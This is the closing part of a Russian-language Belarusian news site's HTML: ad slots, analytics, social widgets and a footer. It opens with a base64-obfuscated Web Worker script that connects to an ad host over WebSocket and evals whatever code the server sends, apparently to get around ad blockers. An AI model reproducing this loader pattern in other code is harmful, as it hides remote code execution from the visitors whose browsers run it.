                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker20422.postMessage(data);
                }

                worker20422 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker20422.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker20422.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
</div>
<br><br>
<!-- <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4199418862563420"
     data-ad-slot="7187455882"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script> -->


<!-- Yandex.RTB R-A-150149-28 -->
<div id="yandex_rtb_R-A-150149-28"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-28",
                renderTo: "yandex_rtb_R-A-150149-28",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script> 
			</div>
		</main>
		
		<aside class="social">
			<div class="container text-center">
				<h4>Мы в социальных сетях, присоединяйся</h4>

				<div class="row">
					<div class="col-md-4">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?136"></script>
<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
	VK.Widgets.Group("vk_groups", {mode: 0, width: "auto", height: "420"}, 44883411);
</script>
					</div>
					<div class="col-md-4">
<div id="ok_group_widget"></div>
<script>
!function (d, id, did, st) {
  var js = d.createElement("script");
  js.src = "https://connect.ok.ru/connect.js";
  js.onload = js.onreadystatechange = function () {
  if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
      this.executed = true;
      setTimeout(function () {
        OK.CONNECT.insertGroupWidget(id,did,st);
      }, 0);
    }
  }}
  d.documentElement.appendChild(js);
}(document,"ok_group_widget","51704289099929",'{"width":360,"height":420}');
</script>
					</div>
					<div class="col-md-4">
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.8&appId=128720990534159";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script><div class="fb-page" data-href="https://www.facebook.com/GomelToday/" data-tabs="timeline" data-height="420" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/GomelToday/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/GomelToday/">Гомель - Сильные Новости</a></blockquote></div>
					</div>
				</div>
			</div>
		</aside>

	<footer>
		<div class="container">
			<div class="row">
				<div class="col col-md-1 col-sm-6 col-xs-1"><!--LiveInternet logo--><a href="//www.liveinternet.ru/click"
								target="_blank"><img src="//counter.yadro.ru/logo?18.1"
								title="LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодня"
								alt="" border="0" width="88" height="31"/></a><!--/LiveInternet-->
					<p style="display:inline-block; font-size:20px; color:white; padding:10px; border: 2px solid white; margin-top:30px;">14+</p>
				</div>
				<div class="col col-md-8 col-sm-6 col-xs-12">
						<strong>&copy; 2019 Сильные Новости - Гомель сегодня</strong><br>
						Перепечатка материалов сайта и использование информации допускается только при указании прямой активной индексируемой гиперссылки, а также имени и фамилии автора (авторов) материала.
				</div>
				<div class="col col-md-3 col-sm-6 col-xs-12 text-right">
						<ul class="list-unstyled">
							<li class="phone"><a href="/ad/" target="_blank" class="btn btn-info">Заказать рекламу</a><br><br><i class="sprite sphone"></i> +375(33)603-33-39</li>
							<li class="email"><i class="sprite semail"></i>advertisingsn@gmail.com</li>
							<li class="email">Связь с редакцией:<br><i class="sprite semail"></i>gomel.today@gmail.com</li>
						</ul>
				</div>
			</div>
		</div>
	</footer>		
		<div id='admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247'); }); </script>
		<div id='admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247'); }); </script>
		<div id='admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247'></div> <script type='text/javascript'> admixerML.fn.push(function() {
admixerML.display('admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247'); }); </script>
	<!-- Google Analytics -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-96780669-1', 'auto');
  ga('send', 'pageview');
</script>
		<div class="button-up"></div>
		
		<!-- Яндекс №4 -->
		<script type="text/javascript">
    		(function(w, d, n, s, t) {
       			 w[n] = w[n] || [];
       			 w[n].push(function() {
          			  Ya.Context.AdvManager.render({
               		  blockId: "R-A-150149-20",
             			   renderTo: "yandex_rtb_R-A-150149-20",
           					async: true
          			  });
       			 });
        		t = d.getElementsByTagName("script")[0];
       			 s = d.createElement("script");
       			 s.type = "text/javascript";
      			  s.src = "//an.yandex.ru/system/context.js";
       			 s.async = true;
       			 t.parentNode.insertBefore(s, t);
    		})(this, this.document, "yandexContextAsyncCallbacks");
</script>
		
		<div id="adriver_banner_1306727653"></div>
<script type="text/javascript">
new adriver("adriver_banner_1306727653", {sid:211499, bt:52});
</script>
		<!--  AdRiver code START. Type:AjaxJS Site: СН PZ:2 BN:13 -->
		<div id="adriver_banner_2126930171" class="adriverBanner"></div>
		<script type="text/javascript">
			new adriver("adriver_banner_2126930171", {sid:211499, bt:52, bn:13, pz:2});
		</script>
		<!--  AdRiver code END  -->

		
	</body>
</html>
